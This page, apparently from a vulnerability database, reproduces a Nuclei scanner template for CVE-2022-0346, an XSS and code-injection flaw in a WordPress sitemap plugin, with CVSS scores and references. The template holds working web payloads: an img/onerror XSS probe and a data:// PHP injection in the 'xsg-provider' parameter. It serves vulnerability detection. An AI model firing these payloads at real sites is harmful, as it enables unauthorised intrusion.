Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0346
HistoryMay 19, 2022 - 5:59 p.m.

WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution

2022-05-1917:59:08
ProjectDiscovery
github.com
5
cve2022
wordpress
wpscan
wp-plugin
xmlsitemapgenerator
cross-site scripting
remote code execution
www-xml-sitemap-generator-org

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

37.9%

WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
id: CVE-2022-0346

info:
  name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
  author: Akincibor,theamanrawat
  severity: medium
  description: |
    WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
  impact: |
    Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code on the affected system or inject malicious scripts into web pages viewed by users.
  remediation: |
    Update the WordPress XML Sitemap Generator for Google plugin to version 2.0.4 or later to mitigate the XSS and RCE vulnerabilities.
  reference:
    - https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
    - https://wordpress.org/plugins/www-xml-sitemap-generator-org/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0346
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0346
    cwe-id: CWE-79
    epss-score: 0.00088
    epss-percentile: 0.36353
    cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: xmlsitemapgenerator
    product: xml_sitemap_generator
    framework: wordpress
  tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator

http:
  - method: GET
    path:
      - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
      - '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'

    stop-at-first-match: true
    matchers:
      - type: word
        part: body_1
        words:
          - "<img src onerror=alert(document.domain)>"
          - "Invalid Provider type specified"
        condition: and

      - type: word
        part: body_2
        words:
          - "2ef3baa95802a4b646f2fc29075efe34"
# digest: 4a0a0047304502207d2a96d8b612ce4a67493cb2efe8bbf581fc923a82a6780381eac155e516a54a022100df8135e7c3f0677db81de3193b326f45c039b22e9b2bf7acc710c7431e8b6103:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

37.9%

Related for NUCLEI:CVE-2022-0346